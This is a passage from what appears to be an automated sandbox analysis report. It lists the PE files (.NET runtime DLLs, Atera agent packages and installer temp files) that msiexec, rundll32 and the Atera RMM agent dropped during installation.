                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.DiaSymReader.Native.amd64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Core.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Ping.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceModel.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI28DE.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIDDD3.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\WindowsBase.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Claims.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A60.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\dbgshim.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID8C1.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 4c9998.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Requests.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\browser\lib\net6.0\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.AccessControl.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI66C4.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Annotations.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Configuration.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA259.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9B15.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebProxy.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Security.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSID8C1.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Mail.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Metadata.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.DataSetExtensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBD86.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dllJump to dropped file
